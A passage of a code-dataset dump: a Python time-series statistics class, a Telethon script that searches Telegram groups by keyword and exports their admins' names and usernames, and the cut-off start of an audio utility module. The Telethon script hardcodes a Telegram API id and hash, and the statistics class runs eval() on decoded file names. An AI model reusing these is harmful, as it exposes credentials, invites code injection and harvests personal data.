doctest.ELLIPSIS\n with sup:\n doctest.testmod(optionflags = options)\n", "repo_name": "brsr/mapstuff", "sub_path": "mapstuff/projections.py", "file_name": "projections.py", "file_ext": "py", "file_size_in_byte": 14925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyproj.Geod", "line_number": 23, "usage_type": "call"}, {"api_name": "transformations.Transformation", "line_number": 25, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 50, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 75, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 75, "usage_type": "name"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 95, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 98, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 99, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 99, "usage_type": "name"}, {"api_name": "helper.antipode_v", "line_number": 100, "usage_type": "call"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 102, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.roll", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 111, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 115, "usage_type": "call"}, {"api_name": "helper.triangle_solid_angle", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 122, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 135, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 151, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 153, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 166, "usage_type": "call"}, {"api_name": "transformations.UnitVector.transform", "line_number": 178, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.tensordot", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 225, "usage_type": "attribute"}, {"api_name": "helper.sqrt", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 231, "usage_type": "attribute"}, {"api_name": "helper.trigivenlengths", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 266, "usage_type": "call"}, {"api_name": "helper.sqrt", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 297, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 311, "usage_type": "call"}, {"api_name": "helper.trigivenlengths", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 343, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cosh", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sinh", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 381, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 390, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 391, "usage_type": "call"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 395, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 395, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.testing.suppress_warnings", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 413, "usage_type": "attribute"}, {"api_name": "doctest.NORMALIZE_WHITESPACE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.ELLIPSIS", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.testmod", "line_number": 417, "usage_type": "call"}]}
+{"seq_id": "14334605091", "text": "#!/usr/bin/python\n# pylint: disable=line-too-long\n\"\"\"\nmodule to work with TimeseriesArrayStatistics\n\nautomatically calculates all TimeseriesStats for every Timeseries in TimeseriesArray\nat initialization\n\"\"\"\nimport sys\nimport json\nimport base64\nimport os\nimport logging\n# own modules\nfrom TimeseriesStats import TimeseriesStats as TimeseriesStats\nfrom CustomExceptions import *\n\n#################### hack begin ##########################\n\"\"\"\nhack to mimic some python 2.x behaviour is string\nrepresentation of tuples\n\"\"\"\ndef _b64encode_p3(list_obj):\n if len(list_obj) == 1:\n start =\"(u'\" + list_obj[0] + \"',)\"\n else:\n start =\"(u'\" + \"', u'\".join((str(key) for key in list_obj)) + \"')\"\n encoded = base64.urlsafe_b64encode(start.encode(\"utf-8\")).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64encode_p2(list_obj):\n encoded = base64.urlsafe_b64encode(unicode(tuple(list_obj))).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64decode(encoded):\n decoded = base64.b64decode(encoded).decode(\"utf-8\")\n #print(\"%s -> %s\" % (encoded, decoded))\n return decoded\n\n\nif sys.version_info < (3,0):\n print(\"using python 2 coding funtions\")\n b64encode = _b64encode_p3\n b64decode = _b64decode\nelse:\n b64encode = _b64encode_p3\n b64decode = _b64decode\n##################### hack end ###########################\n\n\nclass TimeseriesArrayStats(object):\n \"\"\"\n hold dictionary of TimeseriesStats objects\n \"\"\"\n\n def __init__(self, tsa):\n \"\"\"\n creates TimeseriesStat objects for every key in given TimeseriesArray object\n index_keys and value_keys are used from given TimeseriesArray object\n\n parameters:\n tsa \n \"\"\"\n # define instance data\n self.__stats = {}\n self.__index_keynames = tuple(tsa.index_keynames)\n self.__value_keynames = tuple(tsa.value_keynames)\n for index_key in tsa.keys():\n try:\n self.__stats[index_key] = TimeseriesStats(tsa[index_key])\n except TimeseriesEmptyError as exc:\n logging.info(\"Timeseries for key %s is length zero, skipping\", index_key)\n\n def __str__(self):\n return json.dumps(self.to_data(), indent=4, sort_keys=True)\n\n to_json = __str__\n\n def __eq__(self, other):\n try:\n assert self.__index_keynames == other.index_keynames\n assert self.__value_keynames == other.value_keynames\n assert len(self.__stats.keys()) == len(other.stats.keys())\n for key in self.__stats.keys():\n assert self.__stats[key] == other.stats[key]\n except AssertionError as exc:\n logging.exception(exc)\n return False\n return True\n\n def __len__(self):\n return len(self.__stats.keys())\n\n def __getitem__(self, key):\n return self.__stats[key]\n\n def __delitem__(self, key):\n del self.__stats[key]\n\n def keys(self):\n return self.__stats.keys()\n\n def values(self):\n return self.__stats.values()\n\n def items(self):\n return self.__stats.items()\n\n @property\n def stats(self):\n return self.__stats\n\n @stats.setter\n def stats(self, value):\n self.__stats = value\n\n @property\n def index_keynames(self):\n return self.__index_keynames\n\n @index_keynames.setter\n def index_keynames(self, value):\n self.__index_keynames = value\n\n @property\n def value_keynames(self):\n return self.__value_keynames\n\n @value_keynames.setter\n def value_keynames(self, value):\n self.__value_keynames = value\n\n def slice(self, value_keys):\n \"\"\"\n remove all values_keys not in value_keys, and return new TimeseriesArrayStats object\n \"\"\"\n assert all((value_key in self.__value_keynames for value_key in value_keys))\n outdata = []\n outdata.append(self.__index_keynames)\n outdata.append(value_keys)\n tsstat_data = []\n for key, tsstat in self.__stats.items():\n data = {}\n for value_key in value_keys:\n data[value_key] = tsstat[value_key]\n tsstat_data.append((key, json.dumps(data)))\n outdata.append(tsstat_data)\n new_tsastat = TimeseriesArrayStats.from_json(json.dumps(outdata))\n return new_tsastat\n\n def get_stats(self, value_key, stat_func_name=None):\n \"\"\"\n returns dictionary of stats of every Timeseries object in Array for this\n specific value_key only\n\n parameters:\n value_key must be in self.value_keys\n stat_func_name must be in self.stat_func_names or None\n\n returns:\n \n \"\"\"\n assert value_key in self.__value_keynames\n if stat_func_name is not None:\n assert stat_func_name in TimeseriesStats.get_stat_func_names()\n ret_data = {}\n for key, t_stat in self.__stats.items():\n if stat_func_name is not None:\n ret_data[key] = t_stat.stats[value_key][stat_func_name]\n else:\n ret_data[key] = t_stat.stats[value_key]\n return ret_data\n\n @staticmethod\n def _get_tsstat_dumpfilename(key):\n \"\"\"\n create filename for stored or to be stored TimeseriesStats objects\n from given key\n key will be base64 encoded\n\n parameters:\n key \n\n returns:\n \n \"\"\"\n return \"tsstat_%s.json\" % b64encode(key)\n\n @staticmethod\n def get_dumpfilename(index_keys):\n \"\"\"\n create filename for stored or to be stored TimeseriesArrayStats\n from given index_keys\n index_keys will be base64 encoded\n\n parameters:\n index_keys \n\n returns:\n \n \"\"\"\n return \"tsastat_%s.json\" % b64encode(index_keys)\n\n def dump(self, outpath, overwrite=False):\n \"\"\"\n dump internal data to json file\n the filename is automatically created from index_keys\n\n parameters:\n outpath path wehere json file will be placed\n overwrite wheter or not a existing file should be overwritten\n \"\"\"\n #logging.info(\"index_keys: %s\", self.__index_keynames)\n outfilename = os.path.join(outpath, self.get_dumpfilename(self.__index_keynames))\n outdata = {\n \"index_keys\" : self.__index_keynames,\n \"value_keys\" : self.__value_keynames,\n \"tsstat_filenames\" : []\n }\n for key, tsstats in self.__stats.items():\n filename = self._get_tsstat_dumpfilename(key)\n fullfilename = os.path.join(outpath, filename)\n if (not os.path.isfile(fullfilename)) or (overwrite is True):\n with open(fullfilename, \"wt\") as outfile:\n tsstats.dump(outfile)\n outdata[\"tsstat_filenames\"].append(filename)\n with open(outfilename, \"wt\") as outfile:\n json.dump(outdata, outfile)\n\n @staticmethod\n def _filtermatch(key_dict, filterkeys, matchtype):\n \"\"\"\n key_dict is the whole index key, aka\n {hostname : test, instance:1, other:2}\n\n filterkey is part\n {hostname : test}\n \"\"\"\n assert matchtype in (\"and\", \"or\")\n matched = 0\n for key in filterkeys.keys():\n if key_dict[key] == filterkeys[key]:\n matched += 1\n # every key must match at AND\n if (matchtype == \"and\") and (matched == len(filterkeys.keys())):\n return True\n # at least one key must match at OR\n elif (matchtype == \"or\") and (matched > 0):\n return True\n return False\n\n @staticmethod\n def _get_load_filenames(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n filterkeys could be a part of existing index_keys\n all matching keys will be used\n \"\"\"\n tsastat_filename = TimeseriesArrayStats.get_dumpfilename(index_keys)\n logging.debug(\"tsastat_filename: %s\", tsastat_filename)\n with open(os.path.join(path, tsastat_filename), \"rt\") as infile:\n data = json.load(infile)\n logging.debug(\"loaded json data\")\n logging.debug(\"index_keys: %s\", data[\"index_keys\"])\n logging.debug(\"value_keys: %s\", data[\"value_keys\"])\n logging.debug(\"number of ts files: %s\", len(data[\"tsstat_filenames\"]))\n filenames = {}\n for filename in data[\"tsstat_filenames\"]:\n logging.debug(\"reading key for tsstat from file %s\", filename)\n enc_key = filename.split(\".\")[0][7:] # only this pattern tsstat_(.*).json\n key = eval(b64decode(str(enc_key))) # must be str not unicode\n key_dict = dict(zip(index_keys, key))\n if filterkeys is not None:\n if TimeseriesArrayStats._filtermatch(key_dict, filterkeys, matchtype):\n logging.debug(\"adding tsastat key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n else:\n # no filterkeys means every file is added\n logging.debug(\"adding tsa key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n return filenames\n\n @staticmethod\n def load(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n load stored json file (with dump() created) and return TimeseriesArrayStats object\n\n parameters:\n path path to search for stored json file, the filename is automatically created from given index_keys\n index_keys list of index_keys\n\n returns:\n \n \"\"\"\n #logging.info(\"index_keys: %s\", index_keys)\n infilename = os.path.join(path, TimeseriesArrayStats.get_dumpfilename(index_keys))\n try:\n fh = open(infilename, \"rb\")\n indata = json.load(fh)\n except Exception as exc:\n logging.exception(exc)\n logging.error(\"something went wrong while loading %s\", infilename)\n raise exc\n #logging.info(\"loaded JSON data: %s\", indata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[\"index_keys\"])\n tsastats.__value_keynames = tuple(indata[\"value_keys\"])\n tsastats.__stats = {}\n #for filename in indata[\"tsstat_filenames\"]:\n for key, filename in tsastats._get_load_filenames(path, index_keys, filterkeys, matchtype).items():\n #logging.info(\"loading TimeseriesStats object from %s\", fullfilename)\n with open(filename, \"rt\") as infile:\n tsastats.__stats[key] = TimeseriesStats.load(infile)\n return tsastats\n\n def to_data(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = {\n \"index_keynames\" : self.__index_keynames,\n \"value_keynames\" : self.__value_keynames,\n \"tsstats_filenames\" : [self._get_tsstat_dumpfilename(key) for key in self.__stats.keys()],\n \"tsastats_filename\" : self.get_dumpfilename(self.__index_keynames)\n }\n return ret_data\n\n def to_json(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = [\n self.__index_keynames,\n self.__value_keynames,\n [(key, timeseries.stats) for key, timeseries in self.__stats.items()]\n ]\n return json.dumps(ret_data)\n\n @staticmethod\n def from_json(jsondata):\n indata = json.loads(jsondata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[0])\n tsastats.__value_keynames = tuple(indata[1])\n tsastats.__stats = {}\n for key, tsstats in indata[2]:\n # from json there are only list, but these are not hashable,\n # so convert key to tuple\n tsastats.__stats[tuple(key)] = TimeseriesStats.from_json(json.dumps(tsstats))\n return tsastats\n\n def to_csv(self, stat_func_name, sortkey=None, reverse=True):\n \"\"\"\n return csv table of data for one specific statistical function\n\n first column is always the identifying key of this TimseriesStat as string\n mainly to use in websites to get easier to the key of this row\n \"\"\"\n yield (\"#key\", ) + self.__index_keynames + self.__value_keynames\n data = None\n if sortkey is not None:\n data = sorted(self.__stats.items(), key=lambda item: item[1][sortkey][stat_func_name], reverse=True)\n else:\n data = self.__stats.items()\n for key, value in data:\n values = list(key) + [value[value_key][stat_func_name] for value_key in self.__value_keynames]\n yield (str(key), ) + tuple(values)\n", "repo_name": "gunny26/datalogger", "sub_path": "datalogger/TimeseriesArrayStats.py", "file_name": "TimeseriesArrayStats.py", "file_ext": "py", "file_size_in_byte": 13175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 28, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 33, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 43, "usage_type": "attribute"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 89, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 148, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 150, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.get_stat_func_names", "line_number": 167, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 230, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 264, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 265, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 266, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 267, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 270, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path", "line_number": 277, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 300, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 302, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 303, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.load", "line_number": 314, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 314, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 340, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 344, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.from_json", "line_number": 352, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 352, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 352, "usage_type": "call"}]}
+{"seq_id": "1117537674", "text": "from telethon.sync import TelegramClient, events\nfrom telethon.tl.types import ChannelParticipantsAdmins\nfrom telethon import functions\nfrom time import sleep\nfrom random import randint\nimport pathlib\nfrom telethon.tl.types import ChannelParticipantsAdmins\n\n# Clients data\napi_id = 1454150\napi_hash = \"6bb467eaad074e28b7bfec3ad1a75d83\"\n\n# enter phone number as a session name\nsession_name = \"37255937683.session\"\n\nsearch_keyword_file = 'lists/search_keywords.txt'\n\n# True = for only groups\n# False = for groups and channels\nsearch_only_groups = True\n\noutput_file_name = 'lists/search_results_output.csv'\n\nprint(\"[+] Script started\")\n\ntry:\n keyword_list = []\n with open(search_keyword_file) as fp:\n temp_list = fp.read().strip().split(\"\\n\")\n for i in temp_list:\n if not i.strip() == '':\n keyword_list.append(i.strip())\n print(f\"[+] Sucessfully got keywords from '{search_keyword_file}'\")\nexcept Exception as e:\n print(f\"[-] Error Occured while reading '{search_keyword_file}'\")\n print(f\"[-] Error : {e}\")\n exit()\n\ndef add_data_to_output_file(keyword, data):\n if not pathlib.Path(output_file_name).exists():\n with open(output_file_name, 'w') as fw:\n fw.write(\"Keyword,Type,Title,Username,Participants,Admins\")\n new_data = ''\n for i in data:\n new_data += f'\\n{keyword},{i}'\n with open(output_file_name, 'a') as fw:\n fw.write(new_data)\n\n# add_data_to_output_file(keyword_list)\n# exit()\n\n# logining to phone\nclient = TelegramClient(session_name, api_id, api_hash).start(phone=session_name)\nif not client.is_user_authorized():\n print(\"\\n[-] Error occured while signing in, delete session file and try again.\")\n exit()\n\nprint(\"[+] Sucessfully logged in\\n\")\nprint(f\"[+] Total keywords found in file : {len(keyword_list)}\\n\")\n\n\n\nasync def main():\n for index, keyword in enumerate(keyword_list):\n print(f\"[{index+1}] {keyword}\")\n result = await client(functions.contacts.SearchRequest(\n q=keyword,\n limit=100\n ))\n # print(result.stringify())\n data = []\n for i in result.chats:\n if i.megagroup:\n chat_type = \"group\"\n chat_admins = \"\"\n try:\n async for user in client.iter_participants(i.username, filter=ChannelParticipantsAdmins):\n if not user.bot:\n if chat_admins:\n chat_admins += f\"|{user.first_name}({user.username})\"\n else:\n chat_admins = f\"{user.first_name}({user.username})\"\n except:\n chat_admins = \"None\"\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n else:\n chat_type = \"channel\"\n chat_admins = \"None\"\n if not search_only_groups:\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n add_data_to_output_file(keyword, data)\n sleep(randint(1,3))\n print(\"\\n[+] All keyword done, terminating script\")\n\nclient.loop.run_until_complete(main())", "repo_name": "JacobZoarets/tgAdminCode", "sub_path": "12.search_groups_channels.py", "file_name": "12.search_groups_channels.py", "file_ext": "py", "file_size_in_byte": 3242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "telethon.sync.TelegramClient", "line_number": 53, "usage_type": "call"}, {"api_name": "telethon.functions.contacts.SearchRequest", "line_number": 66, "usage_type": "call"}, {"api_name": "telethon.functions.contacts", "line_number": 66, "usage_type": "attribute"}, {"api_name": "telethon.functions", "line_number": 66, "usage_type": "name"}, {"api_name": "telethon.tl.types.ChannelParticipantsAdmins", "line_number": 77, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "33911825218", "text": "import os\nimport numpy as np\nimport matplotlib\nimport nlpaug.augmenter.audio as naa\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport librosa.filters\nimport multiprocessing\nimport soundfile as sf\n\ntry:\n from constants import model_params, base_data_path\n from constants import *\nexcept ModuleNotFoundError:\n from .constants import model_params, base_data_path\n from .constants import *\n\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom tqdm import tqdm\nfrom joblib import Parallel, delayed\nfrom scipy import signal\nfrom scipy.io import wavfile\nfrom skopt import gp_minimize\nfrom skopt.space import Real\nfrom functools import partial\nfrom pydub import AudioSegment\n# from keras.utils import multi_gpu_model\n\n# Set a random seed for numpy for reproducibility\nnp.random.seed(42)\n\nif os.environ.get('DISPLAY', '') == '':\n print('no display found. Using non-interactive Agg backend')\n matplotlib.use('Agg')\n\ntry:\n import foundations\nexcept Exception as e:\n print(e)\n\n\ndef load_wav(path, sr):\n return librosa.core.load(path, sr=sr)[0]\n\n\ndef save_wav(wav, path, sr):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n # proposed by @dsmiller\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef save_wavenet_wav(wav, path, sr, inv_preemphasize, k):\n # wav = inv_preemphasis(wav, k, inv_preemphasize)\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef preemphasis(wav, k, preemphasize=True):\n if preemphasize:\n return signal.lfilter([1, -k], [1], wav)\n return wav\n\n\ndef inv_preemphasis(wav, k, inv_preemphasize=True):\n if inv_preemphasize:\n return signal.lfilter([1], [1, -k], wav)\n return wav\n\n\n# From https://github.com/r9y9/wavenet_vocoder/blob/master/audio.py\ndef start_and_end_indices(quantized, silence_threshold=2):\n assert quantized.size > 0\n start, end = 0, quantized.size - 1\n\n for start in range(quantized.size):\n if abs(quantized[start] - 127) > silence_threshold:\n break\n\n for end in range(quantized.size - 1, 1, -1):\n if abs(quantized[end] - 127) > silence_threshold:\n break\n\n assert abs(quantized[start] - 127) > silence_threshold\n assert abs(quantized[end] - 127) > silence_threshold\n\n return start, end\n\n\ndef trim_silence(wav, hparams):\n \"\"\"\n Trim leading and trailing silence\n Useful for M-AILABS dataset if we choose to trim\n the extra 0.5 silence at beginning and end.\n\n Thanks @begeekmyfriend and @lautjy for pointing out\n the params contradiction. These params are separate\n and tunable per dataset.\n \"\"\"\n return librosa.effects.trim(\n wav, top_db=hparams.trim_top_db,\n frame_length=hparams.trim_fft_size,\n hop_length=hparams.trim_hop_size\n )[0]\n\n\ndef get_hop_size(hparams):\n hop_size = hparams.hop_size\n if hop_size is None:\n assert hparams.frame_shift_ms is not None\n hop_size = int(\n hparams.frame_shift_ms / 1000 * hparams.sample_rate\n )\n return hop_size\n\n\ndef linearspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = (\n _amp_to_db(np.abs(D) ** hparams.magnitude_power, hparams) -\n hparams.ref_level_db\n )\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n return S\n\n\ndef melspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = _amp_to_db(_linear_to_mel(\n np.abs(D) ** hparams.magnitude_power, hparams\n ), hparams) - hparams.ref_level_db\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n\n return S\n\n\ndef inv_linear_spectrogram(linear_spectrogram, hparams):\n \"\"\"\n Converts linear spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(linear_spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n # Convert back to linear\n S = (\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power)\n )\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return 